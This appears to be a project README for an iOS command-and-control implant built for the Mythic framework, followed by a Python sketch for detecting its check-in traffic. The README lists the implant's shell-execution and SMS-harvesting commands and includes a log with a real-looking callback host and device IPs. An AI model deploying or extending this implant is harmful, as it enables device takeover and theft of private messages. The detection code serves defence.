Aura is an iOS payload designed to interact with a Mythic C2 (command and control) server and was developed over the 2024 Microsoft Global Hackathon. To fit within the time constraint of one week:
- The agent communicates over plain text HTTP channels
- Mythic will manage and initiate the agent builds as usual, but the actual compilation and configuration of the agent will take place remotely on macOS with the iOS SDK, outside of Docker.
- A limited number of commands will be implemented.
- iOS 12
- The Aura agent currently only supports plain-text HTTP comms.
- This is a development build only requiring a macOS build server for iOS compilation.
- Mythic usually requires Agent code be hosted in Docker containers.
- Edit the Mythic environment file `Mythic/.env` to:
  ```
  MYTHIC_SERVER_BIND_LOCALHOST_ONLY="false"
  RABBITMQ_BIND_LOCALHOST_ONLY="false"
  ```
- Grab the password for RabbitMQ
- Start Mythic C2 (you'll need to have this already)
- Clone this repository
- Edit `Payload_Type/rabbitmq_config.json` with the values from the Mythic server
- Run `python Payload_Type/main.py`
- 🥳 In the Mythic UI you can now build and install Aura!!
| Description | Implemented Command |
|---|---|
| Execute a shell command | `shell_exec [args]` |
| List a file | `ls [args]` |
| Read and correlate SMS messages | `messages` |
| Exit and uninstall the Agent | `exit` |
```
2024-09-20 18:13:33.914 aura[2322:270194] 👋 Hello from the Aura iOS agent!
2024-09-20 18:13:33.916 aura[2322:270194] [DEBUG] Check-in URL: http://ec2-54-245-60-126.us-west-2.compute.amazonaws.com:80/agent_message
2024-09-20 18:13:34.027 aura[2322:270194] {
    action = checkin;
    architecture = arm64;
    domain = local;
    "external_ip" = "136.24.173.189";
    host = "brandontonsipad.localdomain";
    "integrity_level" = 2;
    ips =     (
        "192.168.0.18"
    );
    os = "iOS 12.5.7";
    pid = 2322;
    "process_name" = aura;
    user = mobile;
    uuid = "b355bc11-0c78-41ec-b3b7-7220561137fa";
}
```
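
A defender-side sketch of how a check-in like the one logged above can be recognized in captured HTTP traffic, added here as an example and not part of the Aura code. It assumes Mythic's documented unencrypted framing (base64 of the 36-character payload UUID followed by the JSON body) applies to Aura's plain-text HTTP traffic; `parse_checkin`, `scan` and the sample requests are constructed for illustration.

```python
import base64
import binascii
import json
import re

UUID_RE = re.compile(r"^[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}$", re.I)
# Keys that appear in the check-in dictionary logged above.
CHECKIN_KEYS = {"action", "uuid", "host", "user", "os", "pid", "architecture"}


def parse_checkin(body: bytes):
    """Return check-in fields if body is base64(UUID + JSON check-in), else None."""
    try:
        raw = base64.b64decode(body.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) <= 36:  # needs a 36-character UUID plus a JSON body
        return None
    try:
        prefix = raw[:36].decode("ascii")
        msg = json.loads(raw[36:].decode("utf-8"))
    except ValueError:  # covers UnicodeDecodeError and JSONDecodeError
        return None
    if not UUID_RE.match(prefix) or not isinstance(msg, dict):
        return None
    if msg.get("action") != "checkin" or not CHECKIN_KEYS.issubset(msg):
        return None
    return {"payload_uuid": prefix, "host": msg["host"], "user": msg["user"],
            "os": msg["os"], "pid": msg["pid"]}


def scan(requests):
    """requests: iterable of (method, path, body); return one hit per check-in POST."""
    hits = []
    for method, path, body in requests:
        fields = parse_checkin(body) if method == "POST" else None
        if fields:
            hits.append({"path": path, **fields})
    return hits


# Constructed sample traffic (not captured from a real host).
SAMPLE_UUID = "00000000-0000-4000-8000-000000000001"
SAMPLE_MSG = {"action": "checkin", "uuid": SAMPLE_UUID, "host": "example-ipad.localdomain",
              "user": "mobile", "os": "iOS 12.5.7", "pid": 1234, "architecture": "arm64"}
SAMPLE = [
    ("POST", "/agent_message", base64.b64encode((SAMPLE_UUID + json.dumps(SAMPLE_MSG)).encode())),
    ("POST", "/upload", base64.b64encode(b"ordinary form data, long enough to pass the length check")),
    ("GET", "/index.html", b""),
]

if __name__ == "__main__":
    print(scan(SAMPLE))
```

The check keys on message structure rather than the URL path, so it still matches if the agent is built with a different callback path.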